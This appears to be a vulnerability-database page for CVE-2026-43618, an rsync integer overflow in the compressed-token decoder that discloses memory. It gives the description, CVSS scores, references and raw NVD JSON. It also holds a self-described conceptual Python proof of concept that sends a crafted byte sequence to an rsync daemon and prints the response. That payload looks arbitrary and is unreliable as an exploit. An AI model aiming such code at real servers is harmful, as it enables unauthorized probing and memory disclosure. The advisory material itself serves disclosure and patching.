CVE-2026-43618

Description

Rsync version 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Rsync <= 3.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-43618 (Conceptual)
# This script demonstrates how a malicious sender could trigger the integer overflow.
# Note: This is a simplified representation.

import socket
import struct

def trigger_overflow(target_ip, target_port):
    try:
        # Establish connection to the vulnerable Rsync service
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        
        # Send initial handshake (simplified)
        s.send(b'@RSYNCD: 31.0\n')
        
        # Craft malicious compressed token stream
        # This payload is designed to cause the 32-bit counter to overflow
        # The specific byte sequence depends on the internal decoder logic
        malicious_payload = b'\x00' * 10 + struct.pack('<I', 0xFFFFFFFF) 
        
        # Send the payload
        s.send(malicious_payload)
        
        # Receive response which may contain leaked memory data
        leaked_data = s.recv(4096)
        
        print(f"[+] Potential leaked data: {leaked_data}")
        s.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# trigger_overflow('192.168.1.10', 873)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43618
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43618
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43618/
[4] VulDB https://vuldb.com/cve/CVE-2026-43618
[5] https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
[6] https://github.com/RsyncProject/rsync/security/advisories/GHSA-g37v-g3gj-pmwq
[7] https://www.vulncheck.com/advisories/rsync-integer-overflow-information-disclosure

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43618", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:36.410", "lastModified": "2026-05-20T13:58:07.923", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rsync version 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/RsyncProject/rsync/releases/tag/v3.4.3", "source": "[email protected]"}, {"url": "https://github.com/RsyncProject/rsync/security/advisories/GHSA-g37v-g3gj-pmwq", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rsync-integer-overflow-information-disclosure", "source": "[email protected]"}]}}